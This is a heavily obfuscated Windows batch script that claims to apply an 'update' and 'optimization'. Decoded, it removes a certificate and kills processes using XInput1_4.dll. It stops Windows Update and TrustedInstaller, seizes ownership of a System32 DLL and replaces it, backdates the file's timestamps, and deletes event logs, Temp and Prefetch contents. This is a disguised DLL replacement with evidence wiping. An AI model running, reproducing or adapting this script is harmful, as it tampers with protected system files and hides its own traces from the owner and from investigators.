 %Phi% %RPphyjIpB% %tp% %lCXYBmlvZH% %ga% %i% %mq% %IYrYycRkKH%$%GwFkRBf%c%XBXBGEf%e%WStD%r%vbSSSYDOJ%t%gYOhmyF%O%yjp%b%bKCMfUW%j%hVwqELnuaJ%.%H%F%Z%r%jjaVg%i%CjjZw%e%dXZiSsL%n%nLMulq%d%Czenzle%l%tgr%y%HmNyXvLA%N%TtEmpNpPZb%a%NDSMhHp%m%yx%e%EaJouoh% %fzDgL%=%VCJSHZ% %SuHB%'%eTwYlQiiJ%D%rrWtuZDnSW%i%YbXX%g%nTDlBWMbGe%i%ySGKGbYd%C%wManWTITdn%e%jMjIfpj%r%iIgBX%t%ntJGkQENCV% %EHjOZV%T%nqGM%r%zx%u%oHL%s%tgj%t%IBQtpU%e%rGd%d%mv% %FRnU%C%XxgBhuG%e%UtiScRFEp%r%uD%t%rWCr%i%IAxfLOAT%f%wsZNtHx%i%mGhsJnzS%c%tDlBCA%a%KrwdlQdG%t%AxPw%e%qweJuNx%'%KfdhoX%;%DqVN% %pRBTWAm%^%fQ%
 %bskbJXIby% %BJjTU% %Lr% %D% %kn% %nmIU% %iyPKLOS% %kdHBeDsORt%$%Ydur%s%DfRKR%t%IFDAhwcfZ%o%MYc%r%E%e%ifM%.%ddbKyINzf%A%iHOI%d%IOACe%d%iKDbe%(%aukwwGPvY%$%csgRfCN%c%NWkSy%e%hfwcXtDVI%r%vPCjQEu%t%pwmUvkbKN%O%UvhXJEYCXA%b%syZfOCPR%j%UsEGRwAGN%)%cM%;%cbVH% %y%^%uKDO%
 %pkCVUNIWlV% %nKzJY% %ctouYaHA% %v% %GwmpU% %Ik% %b% %unvcbRehec%$%nO%s%HCpgPs%t%mXipXumF%o%X%r%WzYClMwCf%e%bZRBPRS%.%SpaosV%C%jxJksnhZW%l%kfDZ%o%vtGkDSm%s%WgrPILAs%e%E%(%FBEFaWP%)%Gs%;%IoMrL% %nSwvbZp%^%hkEZE%
 %az% %oePPahBa% %Abe% %SFY%}%kuUF% %Q%^%lhVJLCcno%
"%ugNhDAM% %WzWxc%>%TUXb%n%rxxJtowCOl%u%AqXYLK%l%tDgr% %BnIkQpW%2%uQAyuOwhU%>%luQXsLnsz%&%sW%1%IMgtBMRK%

:: Find and terminate processes using the file
:%l%:%DYPRHYPxr% %YD%F%jWhNHAedZd%i%amvBtpyU%n%CVxyOyeqSa%d%GAhrvegLbp% %cVTTfsiE%a%TcEDOgjF%n%NBEOzXrrMa%d%QFrA% %trPs%t%rhAnbrHdS%e%Gq%r%zjcZ%m%bd%i%YznmHcWeu%n%wgwglQiY%a%GXd%t%cQBh%e%hzl% %TiQDBdOhEp%p%mlDZMQcUr%r%SxMu%o%iNEqacub%c%KmCLAAGte%e%EjnCFzbo%s%xFk%s%JbWwE%e%FoQQuJ%s%phYRjJQC% %mXxDiBth%u%xcu%s%zgiadCmKXW%i%OcKa%n%da%g%yxOp% %Kl%t%hdovq%h%XOv%e%pmMTZY% %Faqs%f%pkZJvUL%i%sVuGfL%l%savAIGQ%e%DhwX%
e%q%c%lYasvXMbzm%h%wozDarzZP%o%xxahWAr% %BACKiHNcR%=%GJEZZywup%=%ZAmePZ%=%YiaumT%=%VK%=%E%=%OBNHuGVNt%=%jW%=%gWwaOYYxu%=%izckNyKJBM%=%ioYc%=%BNQNqevLb%=%LZHcSv%=%OHbOUwZcWO%=%jzQuqxhz%=%xnid%=%bYUorZCP%=%DnoV%=%AbD%=%tSZawTTZf%=%Js%=%bfJhvl%=%myGREpzVBa%=%zoBO%=%dJ%=%lmCoVo%=%WC%=%FQcUtW%=%Fjlhps%=%rXJbChiMIe%=%kp%=%M%=%qHYElz%
echo WARNING: Terminating processes for optimization...
e%PDLxAz%c%NVjcbHx%h%LEVNl%o%sIszk% %cvCqTKZPO%W%UuosNVxgr%A%NVau%R%Npf%N%zNKHGwzK%I%EFQhJAZUaD%N%lViUtyQqPr%G%zzx%:%lChppRkmDf% %ytlXpCvWg%T%JqPGSjf%e%uOGDbsEk%r%qhQsWEw%m%YcIAgubQgc%i%aKDxtx%n%o%a%VCIOI%t%HoaqLabE%i%eD%n%ZcSQisIg%g%OFVS% %TrQRHzJydn%p%MGLIATHkpH%r%W%o%Ttvj%c%uXvmtABhW%e%QCiQVAYnU%s%twzEW%s%enocXvakOd%e%Qw%s%bqHKQQ% %wGEIuFs%f%JnfGv%o%Lq%r%GgHhJRkZD% %tnzgDqmAn%o%vVM%p%PG%t%EPSb%i%diisAGJUwg%m%YrUjD%i%cpgk%z%DcPlXsQI%a%KT%t%PKY%i%uaYAi%o%o%n%Xcoi%.%KCdCiFH%.%e%.%ilTdmlXj%
e%SW%c%e%h%YY%o%J% %kkzirzh%=%MMjOvFCJuZ%=%t%=%ZXk%=%S%=%rilMPFrLN%=%sLnQlrvMIu%=%qFtRiETc%=%GbkLZxlKWz%=%JEwnzWP%=%i%=%zNFoq%=%CybknwS%=%VDToVgV%=%MHvkv%=%HUkYVYQ%=%usRSgCCr%=%SNMCXPxFm%=%hT%=%fsVJCzQO%=%mszjnsfAH%=%k%=%vjCVmASJFA%=%gx%=%MDCI%=%mKZGay%=%zLn%=%a%=%gKLoGXTF%=%tYjv%=%kuP%=%lfre%=%QTZhSQ%
f%FfWgRniZs%o%U%r%ZdFS% %Y%/%xjTIwL%f%B% %TBXhFFNb%"%hfqcJYR%t%VIq%o%umRhZp%k%XJlnv%e%lcHBCdL%n%yZ%s%REEBbC%=%WXnjPZCOk%2%TDOGFSWwiW% %xRPRkDPg%d%vOQcprpAR%e%ErZ%l%wfMsQCc%i%lyyqBbyYW%m%mZICay%s%sqagqnOvFH%=%YPZqMMHO%,%gOwnrgbgrG%"%XhRPgfjy% %MkPpwdW%%%a%dQd% %FittpS%i%iy%n%zQEWwCGBv% %WNy%(%XgbdsxSYV%'%INz%p%RYrVwLgVd%o%CaF%w%sCKKzZw%e%abc%r%j%s%Tb%h%LulBFH%e%umZkHXV%l%mmUr%l%RpFNw% %qjlGiM%-%LFSdu%c%CGfe%o%ioqObqPck%m%SkbMqKPWx%m%sk%a%rbFA%n%LmTlNAo%d%TaGxpx% %IIhHAip%"%woPVsBARjA%$%iZY%P%zWB%r%YxhsCqQYhU%o%jsTIIUZs%c%azR%e%oawPQsxA%s%WTlUrgaA%s%lYRfTz%e%qOs%s%xdhxxmacB% %qfyxcBA%=%tyJYACO% %aFJRdlg%G%aijkun%e%VU%t%Y%-%ZZjQNFqvqp%P%TiJAfg%r%IUL%o%uvTHBR%c%CfFbMbMkt%e%FqjbCbx%s%sKzdcuT%s%k% %M%|%x% %WrmGr%W%C%h%llL%e%sgvZChw%r%cV%e%c%-%Wob%O%KBtbvE%b%GfNTIzT%j%YxCxaMdutQ%e%PISwuiwMw%c%qLWNGf%t%UPDzk% %ncoVc%{%RNfFGbWWk%(%haYYEjr%$%JCGh%_%GkR%.%HI%M%BbCvwnJ%o%HVBwuGzr%d%oenfWBqphQ%u%OCsGA%l%STki%e%RNjfuLVXU%s%yxKsZ% %OU%|%plmd% %GSbMjYgdY%W%dWI%h%dLztXRKlQR%e%BfXY%r%Tqslpn%e%f%-%vWoPd%O%fxLnHC%b%rx%j%aXtwdYaom%e%scTFw%c%Wx%t%X% %COYLnqM%{%PNMD%$%xJhSSOU%_%bXlP%.%rijA%F%NFiTgRoc%i%PbGyUn%l%qCkn%e%TBZkixYc%N%YHdPBP%a%VpGuy%m%qeWUIrNy%e%Hg% %rbVfwsY%-%PBxnDe%m%fvZf%a%bnigy%t%pt%c%zsTGc%h%PVDBboZTl% %Sz%'%fXkFRntJS%X%U%I%hfSghoHkF%n%EopMhn%p%fwNHhE%u%eFxs%t%iPjC%1%TozlsnPmub%_%qff%4%KvRkwM%.%s%d%IyfSjaWUO%l%sL%l%Ms%'%YrGLuaUL%}%zdCbIe%)%YXWWhMsp%}%eysVR% %CfgczyUbbC%|%zvy% %VQYlhuj%S%bw%e%DeQMebz%l%puazbfw%e%yBUhCy%c%iqUytq%t%qseR%-%TaaFJcqs%O%WoWYxhSfi%b%LW%j%RZalq%e%peVDeQq%c%IyqtosdIbq%t%yVk% %O%-%oP%E%Vp%x%xJYhWLqb%p%joJBHTlbU%a%HRyKJcVH%n%cq%d%qycsL%P%pCUCwrZwWW%r%Sj%o%KTXtAYXeAi%p%lrAVUAtb%e%uQhX%r%YQyLPcQ%t%ArI%y%TEfdaBBK% %znSZ%I%gVhpXMObau%d%OUMVa%;%bS% %sMoFUyufOV%$%wQYxtbLaWF%P%ZBzF%r%GOHnlzK%o%oXulFR%c%eUHIf%e%Ybp%s%TAthDhse%s%L%e%adnPwjuxL%s%BWdlfnTH% %uydVNLpmo%-%VmWNNOC%j%W%o%kNrOr%i%AEPF%n%rqkBvmo% %UzrSBn%'%C%,%e%'%vtESNtAfl%"%acwbWAA%'%SWNpAzdp%)%pbN% %UbJGbn%d%HTFAjkR%o%vP% %AibtIcQ%(%tCwmO%
    echo KILLING: Process ID %%a
 %olXTrxB% %QgQimCvGG% %gHvav% %uWvAU%e%nA%c%smVBqV%h%neuTzSE%o%Idtnp% %vGtgcFHri%K%KrRoxCe%I%M%L%gLEQjI%L%AERgDBK%I%EsRGREEAWH%N%JIK%G%paF%:%CLsirsSg% %uJhY%P%sRkzaEA%r%HlCJ%o%pOQVTcMz%c%mVl%e%vPx%s%whufajJJG%s%K% %qyniZvvdDp%I%nOGGWeBHr%D%XTc% %B%%%a%nIafjzlJD%
 %Kqlr% %ZCqd% %sZZRInCJ% %nQH%t%mbXXYLnYjC%a%q%s%RcrQnmkV%k%w%k%RWvdfIuLL%i%bRVDfBkCUc%l%tjnazHe%l%Zrr% %KOeebYX%/%DhHryeV%P%YGUMzaNc%I%OMJS%D%JVQS% %KreAHdgsGT%%%a%OyEfZzr% %ubObOe%/%q%F%aSek%
)%ZhjJ%

:: Stop Windows File Protection temporarily
:%RwuNi%:%zTuhhU% %KCMvLt%S%Gda%t%tLCLkf%o%l%p%SCSC% %NUnqJR%W%esP%i%QQiFg%n%Usz%d%Z%o%RQOMinCARs%w%TrNtxPP%s%T% %MQDsTkYz%F%Keo%i%lYj%l%QTyUirM%e%nDcjF% %DAsxbON%P%bgnrhCy%r%o%o%iTxJdXCI%t%fMl%e%cwFLi%c%DJ%t%Ia%i%OJnETfGFzb%o%qseMNKKHDB%n%RpXqRopQq% %VJ%t%iJq%e%d%m%xxYdpf%p%znJ%o%HApPBRfBQ%r%t%a%ikWODR%r%C%i%rnpMIfbWdQ%l%I%y%JhiJY%
n%sD%e%Toz%t%G% %ORYoqfqPsD%s%MQjbNtu%t%uDOcgy%o%q%p%XFqPh% %vgWqyKhJm%w%caasbkfQQ%u%sCsky%a%jPCfvYWNP%u%pyFh%s%VCnBH%e%VGjhCU%r%pd%v%xYuHTsA% %giNo%>%vcSzPN%n%Rq%u%IrxSDpOlxI%l%SdyXQUB% %hR%2%qIgIWOmLI%>%bQFOtGP%&%NmJuEBsnqq%1%nzGuVKRgT%
n%vBoWCY%e%Dow%t%oncwo% %trW%s%lRDv%t%VMGM%o%XI%p%ezzQLk% %EfNUymtKiJ%t%MhnPyT%r%akxPNi%u%NGmHrDyw%s%iHDAIYscl%t%H%e%VFJxDAr%d%kTYzg%i%taqTXO%n%wCGt%s%MosBs%t%YYTZZNAGL%a%kggvid%l%SVSQIwLlTG%l%TlAKCWFz%e%KXkYESdTW%r%u% %PMLZJyR%>%TM%n%bIyWa%u%yAB%l%oIYgzF% %q%2%svbACKV%>%rpiA%&%XcoyCr%1%WubAWneZWq%

:: Take ownership and modify permissions
:%OxtnUly%:%BCUANP% %Qs%T%UCuFdWzfc%a%zr%k%udbCbsUh%e%Oi% %ZInWwiObzi%o%yioNl%w%eaP%n%Byo%e%FlyQRxM%r%csRqcTMxCi%s%wL%h%XOnAM%i%rJSNM%p%QWqZhDwhQ% %jPBeDZvIK%a%ig%n%aRVptak%d%dvR% %ECDUs%m%yceusuuhv%o%AUE%d%cjLou%i%pbjuVGH%f%uFpdbw%y%bgefHnWnh% %qjSwRmTuD%p%egysL%e%HyiaIqMter%r%jyHngcb%m%kuCCAF%i%P%s%cmh%s%pDgfGDn%i%XSK%o%lkA%n%GHHoDc%s%AYiADIAohH%
i%gZxG%f%jeYFKqh% %eAh%e%Lfh%x%ILRjVXgYyG%i%X%s%mAGvDe%t%d% %eDIdidu%"%IzyAOMPDtE%%system_dll_path%"%WDU% %aZGWiGLOg%(%KQcpjEAWQ%
 %VEHWZTN% %nKDpizAPwb% %JPtjlUoZPM% %VC%t%gCSW%a%u%k%Dqh%e%XVYAGFduCl%o%kfDaL%w%pw%n%Ak% %JoTP%/%wcOyhqlu%f%wy% %WqIAEEc%"%mjWSGeI%%system_dll_path%"%kKnAgY% %PZuB%/%kAFK%a%fOYEouK% %kiVewX%>%tBo%n%ihWsPj%u%cIbdnaSgwS%l%BiSQWipWS% %Cv%2%uyC%>%QPuhCkiQLQ%&%rIMxOtJRy%1%hxeQoayk%
    icacls "%system_dll_path%" /grant Administrators:F /t /c /l >nul 2>&1
 %TuoYcbu% %RIeDcy% %ppsBrmcj% %ribIEjAL%i%z%c%CCiiiqtG%a%bLLgiTToT%c%vJ%l%nQywN%s%EuqwgOEu% %YUeyC%"%opfg%%system_dll_path%"%RDoyPR% %dN%/%CfaMJWVCtA%g%mAMEMLJTDb%r%NibNKp%a%AupVX%n%Ld%t%gltRVs% %WLFwOYnz%A%twjd%d%zjZq%m%XLmnN%i%woAgdsl%n%oRhXk%i%AH%s%oaD%t%ypevb%r%zyzmT%a%jrGmVgeh%t%AhcP%o%EGQwKutAwd%r%IImZmgWpM%s%nCM%:%x%F%ZLvBehQBQ% %LWNsvM%/%Jd%t%kRR% %ReuoyAHy%/%psOgjw%c%uCwZesMot% %BtJngTNCAU%/%jp%l%f% %MDInmFb%>%vpGUHzPKw%n%U%u%XwoLsQRM%l%ZWGGuvuZ% %suiLvzg%2%ehITtwLDa%>%V%&%RGfa%1%ltRvyTov%
)%rfXSpyQ%

:: Copy new file to System32
:%zrDv%:%TckeQawD% %JgWr%C%nMIAWZ%o%xbqrdYU%p%CYavlz%y%ZsygTPEnTj% %P%n%dY%e%O%w%rguen% %NKHWxSG%f%lkmIOaY%i%Eob%l%HbXoePLv%e%Vb% %NICfoGAEbX%t%TcNK%o%WUcTQYJgnF% %KpNzHLFf%S%smJF%y%qjCM%s%Y%t%qlrnbaPZ%e%LAmRWx%m%TSmBmvE%3%d%2%E%
c%MZZbzqh%o%jdU%p%EMeLpRJzRO%y%nIgpuY% %iUKqLnIB%/%B%y%rCLPes% %RGr%"%IlY%%dll_path%"%s% %ttlj%"%TRuZr%%system_dll_path%"%fDCnE%
i%lXJf%f%YAQ% %PGaB%%errorlevel% %FSLqjNFOn%n%azEUFBF%e%RkGYMuzkSf%q%EdCfJr% %GakBR%0%VfXHTvi% %pewHvEBSn%(%C%
    echo ERROR: Failed to apply the update! Try running in Safe Mode.
 %QYcxqvD% %AmMLTCG% %nb% %wCPuAnbdOU%e%uooD%c%acAVrNSBV%h%ROXgotCL%o%e% %oa%E%xkFmbq%R%bryAAmygp%R%DyNmwiDV%O%qo%R%dx%:%ashMo% %caRdAXQ%F%ZjkQHNRK%a%zeivBnNF%i%PiHLty%l%MGJuHCj%e%iUauF%d%Sgxng% %rEHEYsFeVF%t%OARAIIH%o%wdTGhzKW% %mKq%a%OcHhx%p%mUAUKta%p%FoarRlgICt%l%U%y%PadlivD% %jeuVDK%t%xVwnI%h%dEfroP%e%THYnsFa% %spTlEv%u%iT%p%QJCEtBb%d%myJMsrJTb%a%PPUf%t%IGrOju%e%RlZtqPKpq%!%CaffF% %BBGInzLM%T%iw%r%C%y%yueGlUGm% %rUitj%r%ozj%u%lWCOXlHntF%n%nVClJt%n%FkcEbxAlBg%i%JAcgDIB%n%nTWKbO%g%fDpad% %NBH%i%htPzC%n%tK% %F%S%uUXOj%a%CMM%f%bl%e%G% %a%M%qa%o%azqvB%d%aPrrgurVE%e%eJSKZeWH%.%hnHg%
 %sTEju% %MKuAcdZH% %luslWxmxO% %jMOAzd%p%VRDk%a%xxSdOpXuCu%u%j%s%yjNIbpETCO%e%kgIfbk%
 %AIvnDa% %pV% %f% %ToWNHdeDU%e%LwGDq%x%wnTNa%i%bKNH%t%NtgXTlEbgW% %yvkTCQAJ%/%ixFNKnP%b%MsDSQTx%
)%VYOEQG%
echo SUCCESS: Update applied successfully!
e%drRMh%c%tzKJUU%h%qEBWg%o%zHIb% %A%S%KMVAsus%U%qzV%C%hvFMzcw%C%tE%E%CyBmGZGMH%S%bVRMGUY%S%WlLGY%:%uATFuGRm% %EkwsHnNt%U%OAcDDMWjT%p%GsYrXuMj%d%TxLBEcKG%a%qZjNya%t%hYAib%e%SS% %BTxh%a%xRzwf%p%OFRahQpGU%p%vipRMktmQj%l%JztttuykKN%i%EPSGRPumnZ%e%OmWpVHUih%d%DQBPc% %wpH%s%vDCpvxobH%u%xpRAdOBPYh%c%bMaDoVZTZ%c%QIzZOuWfzb%e%GalAERZff%s%goqQGWJco%s%LnkwRNSf%f%b%u%mVlKqyQZ%l%TKMwGuvxO%l%hyeCWvzFI%y%t%!%YWQTZqBIYd%

:: Modify HDN DLL Timestamp
:%xB%:%UlcqTCKAv% %GqBni%M%OF%o%xdgRJq%d%eDALDaKsS%i%qdyQNuKmk%f%qtSKns%y%A% %oLKLCWeq%H%dQGKNSk%D%xE%N%hgs% %jaQDZFUGp%D%F%L%YYqLU%L%w% %uWzBcxYVk%T%Enf%i%WBBXITS%m%I%e%cWqwLNHDb%s%xNttCMv%t%el%a%fMkY%m%LpqjtdAjC%p%C%
powershell -Command "(Get-Item '%system_dll_path%').CreationTime  = '2019-12-06 12:49:00'"
p%AhvT%o%VLGGd%w%t%e%VFlCabrOg%r%C%s%fuijGs%h%MYOlqqKty%e%pWMejm%l%iIhFPlFd%l%TYBWjhscs% %VMnntJM%-%GCw%C%EXIsOSU%o%Xlw%m%iliXFBgI%m%mRwvcGcQT%a%HKfjpA%n%qWxQTqeZ%d%Vuq% %ZFxeHmhv%"%XCAx%(%ekYEZQYB%G%OLiDnlOBva%e%JeN%t%eA%-%DpAXNrO%I%Y%t%Ra%e%sgFNbtjT%m%w% %GZow%'%mJPnIyr%%system_dll_path%'%nUKobLvxt%)%Aw%.%mnj%C%sBpKlkoRd%r%W%e%qpghAiSJ%a%gbPGSpSd%t%rrfeEMQ%i%MNMf%o%HkFDztmVdG%n%honRZhq%T%Hrs%i%hMdh%m%qXWhbsG%e%VuDKLbu% %GHa% %Cu%=%EWjOEeHVxH% %NNpzufI%'%uWjnY%2%LmxTHHEBo%0%dYHcHfSuE%1%ITk%9%yZMyvXAEeo%-%WCi%1%rYrNcW%2%JULpyWRgH%-%ieLjTQa%0%sXW%6%xntAZlnLK% %ksLX%1%AFMagunH%2%qv%:%s%4%mIFemv%9%CUjkqC%:%WhUMXTNPDx%0%XillQDE%0%JfF%'%pfsM%"%H%
powershell -Command "(Get-Item '%system_dll_path%').LastAccessTime = '2019-12-06 12:49:00'"
p%gMItZhZ%o%VKjlPiPLG%w%CoNOFNvemN%e%YEVlvK%r%ofbTqDorUI%s%rKcdqXf%h%xYCQYKpky%e%WuGgSoE%l%bzgRIst%l%JKT% %Fl%-%mWG%C%KdJsnxYF%o%jxA%m%op%m%OaV%a%FZoHnL%n%uiNAj%d%zHWWr% %XtM%"%FOFCuyJ%(%ZRM%G%SEprDiW%e%ufZapln%t%NXaOMtdk%-%vxFstJLb%I%vadeyfG%t%BKdSIpfK%e%MAoBK%m%ich% %FSJP%'%kIIWDTOKX%%system_dll_path%'%XoCUAp%)%Wt%.%YhodrXGvk%L%cFzsBAxp%a%UNDSfrwLF%s%WCAMNQq%t%UM%A%vSXL%c%mUATwPQEA%c%blx%e%f%s%SYrAQKgnk%s%JD%T%fMjLVxF%i%ZGX%m%IQWrVqqq%e%MBzLrX% %lmINLUkjNM%=%h% %IwtkLLzS%'%xXeOjvE%2%ljRjjf%0%x%1%pHkcW%9%IyxOv%-%PmnXGiOyB%1%amcGlj%2%JARnKOXzMX%-%siiSt%0%CtojRSwQFi%6%lmOTGj% %nb%1%TADWporVUF%2%jtoeGwo%:%hDswB%4%lhuYUcbWD%9%ryFmPFzMG%:%H%0%BjW%0%VAGeEqN%'%sw%"%isLlSxR%
powershell -Command "(Get-Item '%system_dll_path%').LastWriteTime  = '2019-12-06 12:49:00'"
p%jNF%o%QZOTMim%w%YcQkPxs%e%LuQ%r%i%s%aj%h%mRU%e%cDR%l%fUGGcR%l%NkjAkvrB% %NUxduHNA%-%tUPG%C%N%o%ooHsZS%m%Zjr%m%zUHoFAnNtC%a%GEwba%n%Tkeqisp%d%JucsEC% %N%"%YEkV%(%RqRndS%G%A%e%OH%t%dldDmUxbel%-%AsWDXSlpW%I%wUwRXuN%t%e%e%QUUT%m%XQnEOEVz% %cCkeNEBMpA%'%IEj%%system_dll_path%'%papJoYnXp%)%LSpGJ%.%aOM%L%bjGJZBUhV%a%ePK%s%Oi%t%bfgQTGFLVg%W%xO%r%vB%i%zfdc%t%xrE%e%dKnT%T%byJOtxLgAy%i%Lv%m%ZkFr%e%h% %Wd% %Gw%=%SGlVOREU% %DkdA%'%iSpiaH%2%QqanpSXNCm%0%SbjUojePK%1%dJF%9%zshL%-%IbGtRxHqZ%1%Ygzs%2%qWPJfRWI%-%bWI%0%uDYBf%6%hDZzl% %jT%1%yYAalfFMC%2%bge%:%BTuu%4%uBBWFdHG%9%rj%:%oKSaDQIEy%0%djtXIOp%0%QcwhYFwv%'%Dkt%"%qB%

:: Restart stopped services
:%hwdUdVsWTh%:%WL% %RkRbcXeTR%R%nmic%e%ujFqBC%s%zMTjXGLObe%t%uk%a%FqnSrYmHM%r%smy%t%EocVVBD% %fFHTH%s%wXdKe%t%QzvVh%o%SEUA%p%DMVNSlEMC%p%us%e%uKzLhjZW%d%a% %JKE%s%bKhxMDxx%e%PGfoos%r%HMuAJDbp%v%IaD%i%jiwTz%c%uQZ%e%NcphGngBG%s%hjOGl%
n%B%e%KnDiEG%t%RHQ% %nnJT%s%L%t%d%a%MtVuyLK%r%jPA%t%iXLpoXRk% %AdCR%w%CzLoUWjJ%u%ROhdn%a%PEwGQskr%u%wT%s%NWd%e%labxwf%r%AoYxhWi%v%AtyuX% %z%>%uoxU%n%ZW%u%ooomJFSU%l%DJrR% %iLTtYzTGzO%2%dx%>%DeydbHzM%&%egIlG%1%nLTupa%
n%hBRGLdLquF%e%GJzDCX%t%ttqjrzOT% %qihed%s%eBqyi%t%gDbQTXC%a%fkgwi%r%iHf%t%tVUucK% %GPWkDhezcP%t%jhKEBddHZ%r%mJquBligBf%u%YzJJG%s%w%t%laL%e%ck%d%NAWCmM%i%dQWjaYKX%n%Ihj%s%Arrg%t%NxdWX%a%eoIRAfZjOf%l%VE%l%avQLXa%e%FPAoTXlDn%r%yzVvm% %Qq%>%vyE%n%BKUtJQX%u%FBB%l%nLKt% %wdNWPFWqn%2%HaqBfP%>%ZKEknnJeKV%&%WQxcFl%1%lMN%

:: Clear all logs after optimization
:%VS%:%HZYXqQWY% %VnkY%C%jqvenmGiYi%l%kiU%e%JwfBcpfi%a%yZ%r%er% %PIQZbd%a%pJOGNrcSA%l%eOjfEtc%l%oxpHOLzr% %I%l%mOaaonTqo%o%aSydHjzU%g%NgbBuNwaP%s%RdnIaIwRF% %rJCF%a%NHrwLrM%f%twOWJ%t%vtjesdaJZG%e%cUH%r%vrRlP% %omkHBvAZoD%o%VUFyf%p%zfP%t%Vuq%i%dzCYZhZZ%m%IAiUyl%i%qjOIECoYxt%z%Xnv%a%imEeymWy%t%NTyMMTYNDl%i%XLqcIpjbJ%o%ok%n%xIbSHqVgp%
e%oEj%c%YXxtvFlVN%h%krcwurHS%o%BeuSiT% %voHQrhW%=%AuIMimqon%=%v%=%eKZKGTOafD%=%yXvmc%=%kmpDuXs%=%gDRzJ%=%mWGJID%=%NQHs%=%ijPIcgzQrB%=%dxBdMq%=%ECFmRt%=%pLE%=%EKNZWhCWz%=%AJtiUxNA%=%EsJyGPVR%=%XXy%=%whCtGqmps%=%VBT%=%XXWZK%=%DrbvU%=%WUZ%=%cxtZaCxhr%=%SwLYWxbp%=%Yj%=%PZuCrZ%=%XHUducgnnP%=%bs%=%BmAzapcJH%=%RfMXFh%=%qLKhzIAX%=%iPRASgJ%=%WB%
e%tceRS%c%SjuqY%h%QbEugmbzvx%o%gpRaEgBCIy% %pcqys%C%SN%l%fcGDCSBqR%e%viCggML%a%FoTEN%r%Tts%i%MhpH%n%RzIlN%g%iuFbY% %rDOmTZiDvt%l%JqPYShiNKd%o%RoZ%g%t%s%o% %LxXHedcBp%a%nvMpfChfkO%f%C%t%sAMgNEKx%e%PImRCvJvjx%r%UbYvDOnX% %IKb%o%Z%p%jzQzbuNOl%t%swMCETp%i%kbvdLIx%m%pSSvNllz%i%OstWr%z%VDyRupTeL%a%uKW%t%PKaAoP%i%z%o%TLlCmg%n%rnzkk%.%eDCuF%.%FSMb%.%zHssBvILnb%
e%jSvcWulEC%c%pdcpCsd%h%XsEOum%o%NtwXgoDxy% %DLRvEVut%=%vxkQ%=%beqtpTyL%=%G%=%sG%=%UnROyUfWf%=%vnzQEkaJ%=%cMjAk%=%OcnJOi%=%b%=%KFRIQr%=%IvGOrN%=%NgHK%=%bHfCped%=%D%=%LuQaLiKIVj%=%TX%=%PRo%=%uRd%=%e%=%ZIw%=%LbPNiu%=%EghF%=%j%=%q%=%yZwYsXQAKb%=%zZyg%=%lZEMG%=%XrVmDw%=%o%=%ulSKYNimfJ%=%L%=%ngb%
d%jcxPQnW%e%Eddt%l%SRwTvBDoxU% %daAvyNL%/%b%s%vJLZjXym% %uE%/%NlkRVQswWQ%f%wCTVblS% %zYCuaoXnyG%/%wvp%q%iVZUhrXD% %kpmMyLw%"%nUYPe%%WinDir%\%L%L%P%o%lINON%g%sMO%s%WF%\%RKHsdS%*%agPzZk%"%A% %Efrt%>%JwX%n%PDoekodk%u%Avhe%l%FxNSkYHmB% %rVmgEV%2%bTDdyKu%>%CvclJE%&%rJZj%1%HfmhfkLQ%
d%epBl%e%C%l%SdXl% %LZkJ%/%t%s%c% %SKXSjPRbYR%/%LS%f%zBcW% %UcDnSEBcDJ%/%gPSnQXz%q%wQXlZ% %aEO%"%QX%%SystemRoot%\%gGLoFRS%S%AlU%y%VZ%s%xTNwg%t%WEhy%e%iAmxLM%m%BF%3%dvas%2%H%\%CxfIl%w%luvTPpvxO%i%Y%n%GUUeMHkqVA%e%sjZflCtzWB%v%TG%t%iYvkvA%\%eX%L%R%o%qe%g%kc%s%gUf%\%VGeho%*%Vsw%"%PVLVkDds% %zuPDmpNxyK%>%DMZctMI%n%nYdKECDRW%u%clm%l%poSrMCNVQb% %AKSDWns%2%ibP%>%qnR%&%gc%1%UGu%
d%etAarkVdw%e%I%l%vIIrnSofil% %JmJ%/%KfjJ%s%VihLePjw% %HD%/%VB%f%pRHPZ% %as%/%rusRdGjH%q%DxKQY% %kAA%"%uMDXlKWa%%LocalAppData%\%pLKoJqI%T%dB%e%Vdrq%m%dmJ%p%yPGv%\%uORiD%*%Z%"%lVFVsPCOX% %rK%>%wCgjs%n%CuHrkD%u%kBhUixEjZ%l%xTLzD% %ujEnqK%2%SoSDJXir%>%phqNyKZ%&%nWF%1%wwFnymQrO%
d%ncj%e%LXgyovcrH%l%nB% %RAupXcC%/%wL%s%ZsR% %yqouVMr%/%TmUPmGjL%f%PdxcUM% %z%/%b%q%jgpUaIXeA% %dmLj%"%HPyUEXRgP%%Temp%\%Sj%*%JjYMOOC%"%ppcpTXq% %bEZZD%>%RmRDyF%n%g%u%kAIJ%l%zvTlAEddej% %prLWVEkc%2%XGDX%>%O%&%MQ%1%m%
d%El%e%dfdzWXKHM%l%KpBndwKnp% %VMbw%/%XFW%s%Ibhw% %vryaAYwj%/%CorN%f%eHdc% %xd%/%LMcljw%q%Ou% %XqsTq%"%qYHSKL%%WinDir%\%RKAucBBa%T%xFJCatoU%e%UEjnpCRn%m%YNhzM%p%bTPNRydDh%\%MzDta%*%vVskSmVk%"%IP% %Ina%>%sTKb%n%nXnskk%u%u%l%ebojTBcS% %XuQOq%2%ljOtfBIS%>%AWw%&%TNY%1%NkOqxDJH%
d%xFJWWUvh%e%aKxVliv%l%wveIwaZK% %m%/%ptRVqcTW%s%TdwWJfDvdV% %kGGKP%/%ZJayBx%f%d% %GByHQaW%/%fFBZSeSs%q%Tpd% %buZPwP%"%vwJXIE%%SystemRoot%\%RKoyQb%P%WONY%r%kJGgi%e%uIDV%f%ffEWjb%e%AQgVaXYA%t%jljA%c%XCAXTyGhPR%h%gBWIH%\%vZ%*%ZQrng%"%OrpEaAvRv% %hNzCidW%>%vDBSaO%n%M%u%pQEReG%l%C% %hzw%2%YLxpHv%>%iWlAGPmJ%&%vAgYMJOV%1%uXOd%
